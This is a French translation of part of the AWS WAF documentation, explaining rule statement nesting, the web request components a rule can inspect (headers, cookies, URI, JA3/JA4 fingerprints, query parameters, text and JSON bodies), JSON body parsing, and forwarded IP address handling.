AWS WAF prend en charge l'imbrication pour de nombreuses instructions de règles, mais pas pour toutes. Par exemple, vous ne pouvez pas imbriquer une instruction de groupe de règles dans une autre instruction. Vous devez utiliser l'imbrication pour certains scénarios, tels que les instructions scope-down et les instructions logiques. Les instructions de règles et les détails des règles qui suivent décrivent les capacités d'imbrication et les exigences pour chaque catégorie et règle.

L'éditeur visuel des règles de la console ne prend en charge qu'un seul niveau d'imbrication pour les instructions de règles. Par exemple, vous pouvez imbriquer de nombreux types d'instructions dans une logique AND ou une OR règle, mais vous ne pouvez pas en imbriquer une autreAND, car cela nécessite un deuxième niveau d'imbrication. OR Pour implémenter plusieurs niveaux d'imbrication, fournissez la définition de la règle au format JSON, soit par le biais de l'éditeur de règles JSON de la console, soit par le biais duAPIs. 

**Topics**
+ [Réglage des paramètres des instructions de règle dans AWS WAF](waf-rule-statement-fields.md)
+ [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md)
+ [Référencement d'entités réutilisables dans AWS WAF](waf-rule-statement-reusable-entities.md)

# Réglage des paramètres des instructions de règle dans AWS WAF
<a name="waf-rule-statement-fields"></a>

Cette section décrit les paramètres que vous pouvez spécifier dans les instructions de règle qui inspectent un composant de la requête Web. Pour plus d'informations sur l'utilisation, consultez les instructions de règles individuelles à l'adresse[Utilisation des instructions de règles de correspondance dans AWS WAF](waf-rule-statements-match.md). 

Un sous-ensemble de ces composants de requête Web peut également être utilisé dans des règles basées sur le taux, sous forme de clés d'agrégation de demandes personnalisées. Pour plus d'informations, consultez [Agrégation des règles basées sur les taux dans AWS WAF](waf-rule-statement-type-rate-based-aggregation-options.md).

Pour les paramètres du composant de demande, vous spécifiez le type de composant lui-même, ainsi que toutes les options supplémentaires, en fonction du type de composant. Par exemple, lorsque vous inspectez un type de composant contenant du texte, vous pouvez lui appliquer des transformations de texte avant de l'inspecter. 

**Note**  
Sauf indication contraire, si une requête Web ne possède pas le composant de demande spécifié dans l'instruction de règle, la demande est AWS WAF évaluée comme ne correspondant pas aux critères de la règle.

**Contents**
+ [Demandez des composants dans AWS WAF](waf-rule-statement-fields-list.md)
  + [Méthode HTTP](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-http-method)
  + [En-tête seul](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-single-header)
  + [Tous les en-têtes](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-headers)
  + [Ordre des en-têtes](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-header-order)
  + [Cookies](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-cookies)
  + [fragment d'URI](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-uri-fragment)
  + [chemin de l'URI](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-uri-path)
  + [JA3 empreinte digitale](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-ja3-fingerprint)
  + [JA4 empreinte digitale](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-ja4-fingerprint)
  + [Chaîne de requête](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-query-string)
  + [Paramètre de requête unique](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-single-query-param)
  + [Tous les paramètres de requête](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-all-query-params)
  + [Corps de texte](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-body)
  + [corps JSON](waf-rule-statement-fields-list.md#waf-rule-statement-request-component-json-body)
+ [Utilisation des adresses IP transférées dans AWS WAF](waf-rule-statement-forwarded-ip-address.md)
+ [Inspection des pseudo-en-têtes HTTP/2 dans AWS WAF](waf-rule-statement-request-components-for-http2-pseudo-headers.md)
+ [Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md)

# Demandez des composants dans AWS WAF
<a name="waf-rule-statement-fields-list"></a>

Cette section décrit les composants de la requête Web que vous pouvez spécifier pour inspection. Vous spécifiez le composant de demande pour les instructions de règle de correspondance qui recherchent des modèles dans la requête Web. Ces types d'instructions incluent les instructions de correspondance de chaîne, de correspondance régulière, de contrainte de taille et d'attaque par injection SQL. Pour plus d'informations sur l'utilisation de ces paramètres de composant de requête, consultez les instructions de règle individuelles à l'adresse [Utilisation des instructions de règles de correspondance dans AWS WAF](waf-rule-statements-match.md)

Sauf indication contraire, si une requête Web ne possède pas le composant de demande spécifié dans l'instruction de règle, la demande est AWS WAF évaluée comme ne correspondant pas aux critères de la règle.

**Note**  
Vous spécifiez un composant de demande unique pour chaque instruction de règle qui le requiert. Pour inspecter plusieurs composants d'une demande, créez une instruction de règle pour chacun d'eux. 

La documentation de la AWS WAF console et de l'API fournit des conseils sur les paramètres des composants de demande aux emplacements suivants : 
+ **Générateur de règles** sur la console : dans les paramètres de **déclaration** pour un type de règle normal, choisissez le composant que vous souhaitez inspecter dans la boîte de dialogue **Inspecter** sous **Composants de demande**.
+ **Contenu de la déclaration d'API** — `FieldToMatch`

Le reste de cette section décrit les options relatives à la partie de la requête Web à inspecter. 

**Topics**
+ [Méthode HTTP](#waf-rule-statement-request-component-http-method)
+ [En-tête seul](#waf-rule-statement-request-component-single-header)
+ [Tous les en-têtes](#waf-rule-statement-request-component-headers)
+ [Ordre des en-têtes](#waf-rule-statement-request-component-header-order)
+ [Cookies](#waf-rule-statement-request-component-cookies)
+ [fragment d'URI](#waf-rule-statement-request-component-uri-fragment)
+ [chemin de l'URI](#waf-rule-statement-request-component-uri-path)
+ [JA3 empreinte digitale](#waf-rule-statement-request-component-ja3-fingerprint)
+ [JA4 empreinte digitale](#waf-rule-statement-request-component-ja4-fingerprint)
+ [Chaîne de requête](#waf-rule-statement-request-component-query-string)
+ [Paramètre de requête unique](#waf-rule-statement-request-component-single-query-param)
+ [Tous les paramètres de requête](#waf-rule-statement-request-component-all-query-params)
+ [Corps de texte](#waf-rule-statement-request-component-body)
+ [corps JSON](#waf-rule-statement-request-component-json-body)

## Méthode HTTP
<a name="waf-rule-statement-request-component-http-method"></a>

Inspecte la méthode HTTP pour la demande. La méthode HTTP indique le type d'opération que la requête Web demande à votre ressource protégée d'effectuer, telle que `POST` ou`GET`. 

## En-tête seul
<a name="waf-rule-statement-request-component-single-header"></a>

Inspecte un seul en-tête nommé dans la demande. 

Pour cette option, vous spécifiez le nom de l'en-tête, par exemple, `User-Agent` ou`Referer`. La correspondance de chaîne pour le nom ne fait pas la distinction majuscules/minuscules et est effectuée après avoir supprimé les espaces de début et de fin de l'en-tête de la demande et de la règle.

## Tous les en-têtes
<a name="waf-rule-statement-request-component-headers"></a>

Inspecte tous les en-têtes de demande, y compris les cookies. Vous pouvez appliquer un filtre pour inspecter un sous-ensemble de tous les en-têtes. 

Pour cette option, vous devez fournir les spécifications suivantes : 
+ **Modèles de correspondance** : filtre à utiliser pour obtenir un sous-ensemble d'en-têtes à inspecter. AWS WAF recherche ces modèles dans les touches d'en-tête. 

  Le paramètre des modèles de correspondance peut être l'un des suivants : 
  + **Toutes** — Faites correspondre toutes les clés. Évaluez les critères d'inspection des règles pour tous les en-têtes. 
  + **En-têtes exclus** : inspectez uniquement les en-têtes dont les clés ne correspondent à aucune des chaînes que vous spécifiez ici. La correspondance de chaîne pour une clé ne fait pas la distinction majuscules/minuscules. La correspondance est effectuée après avoir découpé les espaces de début et de fin de l'en-tête de la demande et de la règle de correspondance.
  + **En-têtes inclus** : inspectez uniquement les en-têtes dont la clé correspond à l'une des chaînes que vous spécifiez ici. La correspondance de chaîne pour une clé ne fait pas la distinction majuscules/minuscules. La correspondance est effectuée après avoir découpé les espaces de début et de fin de l'en-tête de la demande et de la règle de correspondance.
+ **Champ d'application du match** : parties des en-têtes qui AWS WAF doivent être inspectées selon les critères d'inspection des règles. Vous pouvez spécifier **des clés**, **des valeurs** ou **tout** pour inspecter à la fois les clés et les valeurs pour détecter une correspondance. 

  **Tout** ne nécessite pas qu'une correspondance soit trouvée dans les clés et qu'une correspondance soit trouvée dans les valeurs. Cela nécessite qu'une correspondance soit trouvée dans les clés ou les valeurs, ou dans les deux. Pour exiger une correspondance entre les clés et les valeurs, utilisez une `AND` instruction logique pour combiner deux règles de correspondance, l'une inspectant les clés et l'autre les valeurs. 
+ **Gestion des données surdimensionnées** — AWS WAF Comment gérer les demandes dont les données d'en-tête sont supérieures à ce que AWS WAF vous pouvez inspecter ? AWS WAF peut inspecter au maximum les 8 premiers Ko (8 192 octets) des en-têtes de requête et au plus les 200 premiers en-têtes. Le contenu peut être consulté AWS WAF jusqu'à la première limite atteinte. Vous pouvez choisir de poursuivre l'inspection ou de sauter l'inspection et de marquer la demande comme correspondant ou non à la règle. Pour plus d'informations sur la gestion du contenu surdimensionné, consultez[Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).

## Ordre des en-têtes
<a name="waf-rule-statement-request-component-header-order"></a>

Inspectez une chaîne contenant la liste des noms d'en-tête de la demande, classés tels qu'ils apparaissent dans la demande Web qui est AWS WAF reçue pour inspection. AWS WAF génère la chaîne, puis l'utilise comme champ pour faire correspondre le composant lors de son inspection. AWS WAF sépare les noms des en-têtes dans la chaîne par des deux-points et sans espaces ajoutés, par exemple`host:user-agent:accept:authorization:referer`.

Pour cette option, vous devez fournir les spécifications suivantes : 
+ **Gestion des données surdimensionnées** — Comment AWS WAF gérer les demandes dont les données d'en-tête sont plus nombreuses ou plus volumineuses que celles que l' AWS WAF on peut inspecter ? AWS WAF peut inspecter au maximum les 8 premiers Ko (8 192 octets) des en-têtes de requête et au plus les 200 premiers en-têtes. Le contenu peut être consulté AWS WAF jusqu'à la première limite atteinte. Vous pouvez choisir de continuer à inspecter les en-têtes disponibles ou d'ignorer l'inspection et de marquer la demande comme correspondant ou non à la règle. Pour plus d'informations sur la gestion du contenu surdimensionné, consultez[Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).

## Cookies
<a name="waf-rule-statement-request-component-cookies"></a>

Inspecte tous les cookies de demande. Vous pouvez appliquer un filtre pour inspecter un sous-ensemble de tous les cookies. 

Pour cette option, vous devez fournir les spécifications suivantes : 
+ **Modèles de correspondance** : filtre à utiliser pour obtenir un sous-ensemble de cookies à inspecter. AWS WAF recherche ces modèles dans les clés des cookies. 

  Le paramètre des modèles de correspondance peut être l'un des suivants : 
  + **Toutes** — Faites correspondre toutes les clés. Évaluez les critères d'inspection des règles pour tous les cookies. 
  + **Cookies exclus** : inspectez uniquement les cookies dont les clés ne correspondent à aucune des chaînes que vous spécifiez ici. La correspondance de chaîne pour une clé distingue les majuscules et minuscules et doit être exacte. 
  + **Cookies inclus** : inspectez uniquement les cookies dont la clé correspond à l'une des chaînes que vous spécifiez ici. La correspondance de chaîne pour une clé distingue les majuscules et minuscules et doit être exacte. 
+ **Champ d'application du match** : parties des cookies qui AWS WAF doivent être inspectées selon les critères d'inspection des règles. Vous pouvez spécifier **des clés**, **des valeurs** ou **tout pour les** clés et les valeurs. 

  **Tout** ne nécessite pas qu'une correspondance soit trouvée dans les clés et qu'une correspondance soit trouvée dans les valeurs. Cela nécessite qu'une correspondance soit trouvée dans les clés ou les valeurs, ou dans les deux. Pour exiger une correspondance entre les clés et les valeurs, utilisez une `AND` instruction logique pour combiner deux règles de correspondance, l'une inspectant les clés et l'autre les valeurs. 
+ **Gestion des données surdimensionnées** — Comment AWS WAF gérer les demandes dont les données de cookies sont trop volumineuses pour AWS WAF être inspectées ? AWS WAF peut inspecter au maximum les 8 premiers Ko (8 192 octets) des cookies de demande et au plus les 200 premiers cookies. Le contenu peut être consulté AWS WAF jusqu'à la première limite atteinte. Vous pouvez choisir de poursuivre l'inspection ou de sauter l'inspection et de marquer la demande comme correspondant ou non à la règle. Pour plus d'informations sur la gestion du contenu surdimensionné, consultez[Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md).

## fragment d'URI
<a name="waf-rule-statement-request-component-uri-fragment"></a>

**Note**  
L'inspection des fragments d'URI n'est disponible que pour les CloudFront distributions et les équilibreurs de charge d'application.

Inspecte la partie d'une URL qui suit le symbole « \$1 », fournissant des informations supplémentaires sur la ressource, par exemple, \$1section2. Pour plus d'informations, voir [Uniform Resource Identifier (URI) : syntaxe générique](https://tools.ietf.org/html/rfc3986#section-3). 

Si vous n'utilisez pas de transformation de texte avec cette option, elle AWS WAF ne normalise pas le fragment d'URI et ne l'inspecte pas exactement tel qu'il le reçoit du client dans la demande. Pour plus d'informations sur les transformations de texte, consultez[Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md).

**Exigences relatives à l'énoncé des règles**  
Vous devez fournir un comportement de remplacement pour cette déclaration de règle. Le comportement de remplacement est le statut de correspondance que vous souhaitez attribuer AWS WAF à la requête Web si l'URI manque le fragment ou si le service associé n'est pas Application Load CloudFront Balancer ou. Si vous choisissez de faire correspondre, AWS WAF traite la demande comme correspondant à l'instruction de règle et applique l'action de règle à la demande. Si vous choisissez de ne pas correspondre, AWS WAF traite la demande comme ne correspondant pas à l'instruction de règle.

## chemin de l'URI
<a name="waf-rule-statement-request-component-uri-path"></a>

Inspecte la partie d'une URL qui identifie une ressource, par exemple,`/images/daily-ad.jpg`. Pour plus d'informations, voir [Uniform Resource Identifier (URI) : syntaxe générique](https://tools.ietf.org/html/rfc3986#section-3). 

Si vous n'utilisez pas de transformation de texte avec cette option, elle AWS WAF ne normalise pas l'URI et ne l'inspecte pas exactement telle qu'elle est reçue du client dans la demande. Pour plus d'informations sur les transformations de texte, consultez[Utilisation de transformations de texte dans AWS WAF](waf-rule-statement-transformation.md).

## JA3 empreinte digitale
<a name="waf-rule-statement-request-component-ja3-fingerprint"></a>

Inspecte l' JA3 empreinte digitale de la demande. 

**Note**  
JA3 l'inspection des empreintes digitales n'est disponible que pour les CloudFront distributions Amazon et les équilibreurs de charge d'application.

L' JA3 empreinte digitale est un hachage de 32 caractères dérivé du client TLS Hello d'une demande entrante. Cette empreinte sert d'identifiant unique pour la configuration TLS du client. AWS WAF calcule et enregistre cette empreinte pour chaque demande contenant suffisamment d'informations TLS Client Hello pour le calcul. Presque toutes les demandes sur le Web incluent ces informations.

**Comment obtenir l' JA3 empreinte digitale d'un client**  
Vous pouvez obtenir l' JA3 empreinte digitale des demandes d'un client à partir des journaux du pack de protection (ACL Web). S'il AWS WAF est capable de calculer l'empreinte digitale, il l'inclut dans les journaux. Pour plus d'informations sur les champs de journalisation, consultez[Champs de journal pour le trafic du pack de protection (ACL Web)](logging-fields.md).

**Exigences relatives à l'énoncé des règles**  
Vous ne pouvez inspecter l' JA3 empreinte digitale que dans une instruction de correspondance de chaîne définie pour correspondre exactement à la chaîne que vous fournissez. Fournissez la chaîne JA3 d'empreinte issue des journaux dans votre spécification d'instruction de correspondance de chaîne, afin qu'elle corresponde à toute future demande ayant la même configuration TLS. Pour plus d'informations sur l'instruction de correspondance des chaînes, consultez[Instruction de correspondance de chaîne de règle](waf-rule-statement-type-string-match.md).

Vous devez fournir un comportement de remplacement pour cette déclaration de règle. Le comportement de remplacement est le statut de correspondance que vous souhaitez attribuer AWS WAF à la requête Web si AWS WAF vous ne parvenez pas à calculer l' JA3 empreinte digitale. Si vous choisissez de faire correspondre, AWS WAF traite la demande comme correspondant à l'instruction de règle et applique l'action de règle à la demande. Si vous choisissez de ne pas correspondre, AWS WAF traite la demande comme ne correspondant pas à l'instruction de règle.

Pour utiliser cette option de correspondance, vous devez enregistrer le trafic de votre pack de protection (ACL Web). Pour plus d'informations, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).

## JA4 empreinte digitale
<a name="waf-rule-statement-request-component-ja4-fingerprint"></a>

Inspecte l' JA4 empreinte digitale de la demande. 

**Note**  
JA4 l'inspection des empreintes digitales n'est disponible que pour les CloudFront distributions Amazon et les équilibreurs de charge d'application.

L' JA4 empreinte digitale est un hachage de 36 caractères dérivé du client TLS Hello d'une demande entrante. Cette empreinte sert d'identifiant unique pour la configuration TLS du client. JA4 l'empreinte digitale est une extension de l' JA3 empreinte digitale qui peut réduire le nombre d'empreintes uniques pour certains navigateurs. AWS WAF calcule et enregistre cette empreinte pour chaque demande contenant suffisamment d'informations TLS Client Hello pour le calcul. Presque toutes les demandes sur le Web incluent ces informations.

**Comment obtenir l' JA4 empreinte digitale d'un client**  
Vous pouvez obtenir l' JA4 empreinte digitale des demandes d'un client à partir des journaux du pack de protection (ACL Web). S'il AWS WAF est capable de calculer l'empreinte digitale, il l'inclut dans les journaux. Pour plus d'informations sur les champs de journalisation, consultez[Champs de journal pour le trafic du pack de protection (ACL Web)](logging-fields.md).

**Exigences relatives à l'énoncé des règles**  
Vous ne pouvez inspecter l' JA4 empreinte digitale que dans une instruction de correspondance de chaîne définie pour correspondre exactement à la chaîne que vous fournissez. Fournissez la chaîne JA4 d'empreinte issue des journaux dans votre spécification d'instruction de correspondance de chaîne, afin qu'elle corresponde à toute future demande ayant la même configuration TLS. Pour plus d'informations sur l'instruction de correspondance des chaînes, consultez[Instruction de correspondance de chaîne de règle](waf-rule-statement-type-string-match.md).

Vous devez fournir un comportement de remplacement pour cette déclaration de règle. Le comportement de remplacement est le statut de correspondance que vous souhaitez attribuer AWS WAF à la requête Web si AWS WAF vous ne parvenez pas à calculer l' JA4 empreinte digitale. Si vous choisissez de faire correspondre, AWS WAF traite la demande comme correspondant à l'instruction de règle et applique l'action de règle à la demande. Si vous choisissez de ne pas correspondre, AWS WAF traite la demande comme ne correspondant pas à l'instruction de règle.

Pour utiliser cette option de correspondance, vous devez enregistrer le trafic de votre pack de protection (ACL Web). Pour plus d'informations, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).

## Chaîne de requête
<a name="waf-rule-statement-request-component-query-string"></a>

Inspecte la partie de l'URL qui apparaît après un `?` caractère, le cas échéant.

**Note**  
Pour les instructions de correspondance basées sur des scripts intersites, nous vous recommandons de choisir **Tous les paramètres de requête** au lieu de Chaîne de **requête**. La sélection de **tous les paramètres de requête** ajoute 10 % WCUs au coût de base.

## Paramètre de requête unique
<a name="waf-rule-statement-request-component-single-query-param"></a>

Inspecte un seul paramètre de requête que vous avez défini dans le cadre de la chaîne de requête. AWS WAF inspecte la valeur du paramètre que vous spécifiez. 

Pour cette option, vous devez également spécifier un **argument de requête**. Par exemple, si l'URL est`www.xyz.com?UserName=abc&SalesRegion=seattle`, vous pouvez spécifier `UserName` ou `SalesRegion` pour l'argument de requête. La longueur maximale du nom de l'argument est de 30 caractères. Le nom ne distingue pas les majuscules et minuscules. Ainsi, si vous le spécifiez`UserName`, il AWS WAF correspond à toutes les variantes de`UserName`, y compris `username` et`UsERName`.

Si la chaîne de requête contient plusieurs instances de l'argument de requête que vous avez spécifié, AWS WAF examine toutes les valeurs pour détecter une correspondance, en utilisant la OR logique. Par exemple, dans l'URL `www.xyz.com?SalesRegion=boston&SalesRegion=seattle`, AWS WAF évalue le nom que vous avez spécifié par rapport à `boston` et `seattle`. Si l'un ou l'autre est une correspondance, l'inspection est une correspondance.

## Tous les paramètres de requête
<a name="waf-rule-statement-request-component-all-query-params"></a>

Inspecte tous les paramètres de requête contenus dans la demande. Cela est similaire au choix d'un composant de requête unique, mais AWS WAF inspecte les valeurs de tous les arguments de la chaîne de requête. Par exemple, si l'URL est `www.xyz.com?UserName=abc&SalesRegion=seattle`, AWS WAF déclenche une correspondance si la valeur de `UserName` ou `SalesRegion` correspond aux critères d'inspection. 

Le choix de cette option ajoute 10 WCUs \$1 au coût de base.

## Corps de texte
<a name="waf-rule-statement-request-component-body"></a>

Inspecte le corps de la demande, évalué sous forme de texte brut. Vous pouvez également évaluer le corps au format JSON à l'aide du type de JSON contenu. 

Le corps de la demande est la partie de la demande qui suit immédiatement les en-têtes de la demande. Il contient toutes les données supplémentaires nécessaires à la requête Web, par exemple les données d'un formulaire. 
+ Dans la console, sélectionnez cette option dans le **corps** de l'**option de demande**, en sélectionnant le **type de contenu** **Texte brut**. 
+ Dans l'API, dans la `FieldToMatch` spécification de la règle, vous spécifiez `Body` d'inspecter le corps de la demande sous forme de texte brut.

Pour Application Load Balancer et AWS AppSync, AWS WAF peut inspecter les 8 premiers Ko du corps d'une requête. Par défaut CloudFront, API Gateway, Amazon Cognito, App Runner et Verified Access AWS WAF peuvent inspecter les 16 premiers Ko, et vous pouvez augmenter la limite jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Pour de plus amples informations, veuillez consulter [Considérations relatives à la gestion de l'inspection corporelle dans AWS WAF](web-acl-setting-body-inspection-limit.md).

Vous devez spécifier la gestion des surdimensionnements pour ce type de composant. La gestion des données surdimensionnées définit le AWS WAF mode de traitement des demandes dont les données corporelles sont trop volumineuses pour AWS WAF être inspectées. Vous pouvez choisir de poursuivre l'inspection ou de sauter l'inspection et de marquer la demande comme correspondant ou non à la règle. Pour plus d'informations sur la gestion du contenu surdimensionné, consultez[Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md). 

Vous pouvez également évaluer le corps sous forme de JSON analysé. Pour plus d'informations à ce sujet, consultez la section qui suit. 

## corps JSON
<a name="waf-rule-statement-request-component-json-body"></a>

Inspecte le corps de la demande, évalué au format JSON. Vous pouvez également évaluer le corps sous forme de texte brut. 

Le corps de la demande est la partie de la demande qui suit immédiatement les en-têtes de la demande. Il contient toutes les données supplémentaires nécessaires à la requête Web, par exemple les données d'un formulaire. 
+ Dans la console, vous pouvez le sélectionner dans le choix de l'**option de demande** **Body**, en sélectionnant le choix du **type de contenu** **JSON**. 
+ Dans l'API, dans la `FieldToMatch` spécification de la règle, vous spécifiez`JsonBody`.

Pour Application Load Balancer et AWS AppSync, AWS WAF peut inspecter les 8 premiers Ko du corps d'une requête. Par défaut CloudFront, API Gateway, Amazon Cognito, App Runner et Verified Access AWS WAF peuvent inspecter les 16 premiers Ko, et vous pouvez augmenter la limite jusqu'à 64 Ko dans la configuration de votre pack de protection (ACL Web). Pour de plus amples informations, veuillez consulter [Considérations relatives à la gestion de l'inspection corporelle dans AWS WAF](web-acl-setting-body-inspection-limit.md).

Vous devez spécifier la gestion des surdimensionnements pour ce type de composant. La gestion des données surdimensionnées définit le AWS WAF mode de traitement des demandes dont les données corporelles sont trop volumineuses pour AWS WAF être inspectées. Vous pouvez choisir de poursuivre l'inspection ou de sauter l'inspection et de marquer la demande comme correspondant ou non à la règle. Pour plus d'informations sur la gestion du contenu surdimensionné, consultez[Composants de requête Web surdimensionnés dans AWS WAF](waf-oversize-request-components.md). 

Le choix de cette option double le coût de base du relevé de match WCUs. Par exemple, si le coût de base de l'instruction match est de 5 WCUs sans analyse JSON, l'utilisation de l'analyse JSON double le coût à 10. WCUs 

Pour cette option, vous devez fournir des spécifications supplémentaires, comme décrit dans la section suivante.

**Comment AWS WAF gère l'inspection du corps JSON**  
Lorsqu'il AWS WAF inspecte le corps de la requête Web au format JSON, il exécute des étapes pour analyser le corps et extraire les éléments JSON à des fins d'inspection. AWS WAF exécute ces étapes conformément à vos choix de configuration. 

La liste suivante répertorie les étapes qui s' AWS WAF exécutent. 

1. **Analyse le contenu du corps : AWS WAF analyse le contenu** du corps de la requête Web afin d'extraire les éléments JSON à des fins d'inspection. AWS WAF fait de son mieux pour analyser l'intégralité du contenu du corps, mais l'analyse peut échouer en raison de divers états d'erreur dans le contenu. Les exemples incluent les caractères non valides, les clés dupliquées, la troncature et le contenu dont le nœud racine n'est pas un objet ou un tableau. 

   L'option **Body parsing fallback behavior** détermine ce qui se passe si elle AWS WAF ne parvient pas à analyser complètement le corps JSON : 
   + **Aucun (comportement par défaut)** : AWS WAF évalue le contenu uniquement jusqu'au point où il a rencontré une erreur d'analyse. 
   + **Evaluer en tant que chaîne** - Inspectez le corps en tant que texte brut. AWS WAF applique les transformations de texte et les critères d'inspection que vous avez définis pour l'inspection JSON à la chaîne du corps du texte.
   + **Match** : traitez la requête Web comme correspondant à l'instruction de règle. AWS WAF applique l'action de règle à la demande.
   + **Aucune correspondance** : considérez la requête Web comme ne correspondant pas à l'instruction de règle.
**Note**  
Ce comportement de secours ne se déclenche qu'en cas d' AWS WAF erreur lors de l'analyse de la chaîne JSON. 

**L'analyse ne valide pas complètement le JSON**  
AWS WAF l'analyse ne valide pas complètement la chaîne JSON d'entrée, de sorte que l'analyse peut réussir même pour un JSON non valide.

   Par exemple, AWS WAF analyse le code JSON non valide suivant sans erreur : 
   + Virgule manquante : `{"key1":"value1""key2":"value2"}`
   + Deux-points manquant : `{"key1":"value1","key2""value2"}`
   + Deux-points supplémentaire : `{"key1"::"value1","key2""value2"}`

   Dans de tels cas où l'analyse réussit mais où le résultat n'est pas un JSON complètement valide, le résultat des étapes suivantes de l'évaluation peut varier. L'extraction peut omettre certains éléments ou l'évaluation des règles peut avoir des résultats inattendus. Nous vous recommandons de valider le JSON que vous recevez dans votre application et de gérer le JSON non valide selon les besoins. 

1. **Extraire les éléments JSON** : AWS WAF identifie le sous-ensemble d'éléments JSON à inspecter en fonction de vos paramètres : 
   + L'option **JSON match scope** indique les types d'éléments du JSON qui AWS WAF doivent être inspectés. 

     Vous pouvez spécifier **des clés**, **des valeurs** ou **tout pour les** clés et les valeurs. 

     **Tout** ne nécessite pas qu'une correspondance soit trouvée dans les clés et qu'une correspondance soit trouvée dans les valeurs. Cela nécessite qu'une correspondance soit trouvée dans les clés ou les valeurs, ou dans les deux. Pour exiger une correspondance entre les clés et les valeurs, utilisez une `AND` instruction logique pour combiner deux règles de correspondance, l'une inspectant les clés et l'autre les valeurs. 
   + L'option **Contenu à inspecter** indique comment filtrer l'ensemble d'éléments en fonction du sous-ensemble que vous AWS WAF souhaitez inspecter. 

     Vous devez spécifier l'une des options suivantes :
     + **Contenu JSON complet** : évaluez tous les éléments. 
     + **Éléments inclus uniquement** : évaluez uniquement les éléments dont les chemins correspondent aux critères de pointeur JSON que vous fournissez. N'utilisez pas cette option pour indiquer *tous les* chemins dans le JSON. Utilisez plutôt le **contenu JSON complet**. 

       Pour plus d'informations sur la syntaxe du pointeur JSON, consultez la documentation du pointeur [JSON (JavaScript Object Notation) de l'Internet Engineering Task Force (IETF)](https://tools.ietf.org/html/rfc6901). 

       Par exemple, dans la console, vous pouvez fournir les informations suivantes : 

       ```
       /dogs/0/name
       /dogs/1/name
       ```

       Dans l'API ou la CLI, vous pouvez fournir les éléments suivants : 

       ```
       "IncludedPaths": ["/dogs/0/name", "/dogs/1/name"]
       ```

   Supposons, par exemple, que le paramètre **Contenu à inspecter** soit **Uniquement les éléments inclus** et que le paramètre Éléments inclus soit défini comme tel`/a/b`. 

   Pour l'exemple de corps JSON suivant : 

   ```
   { 
     "a":{
       "c":"d",
       "b":{
         "e":{
           "f":"g"
         }
       }
     }
   }
   ```

   Les ensembles d'éléments qui AWS WAF vérifieraient chaque paramètre de **portée de correspondance JSON** sont répertoriés ci-dessous. Notez que la clé`b`, qui fait partie du chemin des éléments inclus, n'est pas évaluée.
   + **Tous** :`e`, `f,` et`g`.
   + **Clés** : `e` et`f`.
   + **Valeurs** :`g`.

1. **Inspectez le jeu d'éléments JSON** : AWS WAF applique les transformations de texte que vous avez spécifiées aux éléments JSON extraits, puis compare l'ensemble d'éléments obtenu aux critères de correspondance de l'instruction de règle. Il s'agit du même comportement de transformation et d'évaluation que pour les autres composants de requête Web. Si l'un des éléments JSON extraits correspond, la requête Web correspond à la règle. 

# Utilisation des adresses IP transférées dans AWS WAF
<a name="waf-rule-statement-forwarded-ip-address"></a>

Cette section s'applique aux instructions de règles qui utilisent l'adresse IP d'une requête Web. Par défaut, AWS WAF utilise l'adresse IP de l'origine de la requête Web. Toutefois, si une requête Web passe par un ou plusieurs proxys ou équilibreurs de charge, l'origine de la demande Web contiendra l'adresse du dernier proxy, et non l'adresse d'origine du client. Dans ce cas, l'adresse du client d'origine est généralement transmise dans un autre en-tête HTTP. Cet en-tête est généralement `X-Forwarded-For` (XFF), mais il peut être différent. 

**Déclarations de règles utilisant des adresses IP**  
Les instructions de règle qui utilisent les adresses IP sont les suivantes :
+ [Correspondance d'ensemble d'adresses IP](waf-rule-statement-type-ipset-match.md)- Vérifie si l'adresse IP correspond aux adresses définies dans un ensemble d'adresses IP.
+ [Correspondance géographique](waf-rule-statement-type-geo-match.md)- Utilise l'adresse IP pour déterminer le pays et la région d'origine et compare le pays d'origine à une liste de pays.
+ [ASN match](waf-rule-statement-type-asn-match.md)- Utilise l'adresse IP pour déterminer le numéro de système autonome (ASN) et compare l'ASN à une liste de. ASNs
+ [Utilisation d'instructions de règles basées sur les taux](waf-rule-statement-type-rate-based.md)- Peut agréger les demandes par adresse IP pour s'assurer qu'aucune adresse IP individuelle n'envoie de demandes à un rythme trop élevé. Vous pouvez utiliser l'agrégation d'adresses IP seule ou en combinaison avec d'autres clés d'agrégation. 

Vous pouvez demander d' AWS WAF utiliser une adresse IP transférée pour chacune de ces instructions de règle, que ce soit à partir de l'`X-Forwarded-For`en-tête ou d'un autre en-tête HTTP, au lieu d'utiliser l'origine de la requête Web. Pour plus de détails sur la manière de fournir les spécifications, consultez les instructions relatives aux différents types d'instructions de règles.

**Note**  
Si un en-tête est manquant, AWS WAF évalue toute instruction utilisant cet en-tête comme « Aucune correspondance ». Si vous utilisez une instruction NOT avec un résultat « Aucune correspondance », l'évaluation est AWS WAF convertie en « Correspondance ». Les en-têtes manquants ne déclenchent pas de comportement de repli, seules les valeurs d'en-tête non valides le font.

**Comportement de secours**  
Lorsque vous utilisez l'adresse IP transférée, vous indiquez le statut de correspondance AWS WAF à attribuer à la requête Web si celle-ci ne possède pas d'adresse IP valide à la position spécifiée : 
+ **MATCH** - Traitez la requête Web comme correspondant à l'instruction de règle. AWS WAF applique l'action de règle à la demande.
+ **AUCUNE CORRESPONDANCE** - Traitez la requête Web comme ne correspondant pas à l'instruction de règle. 

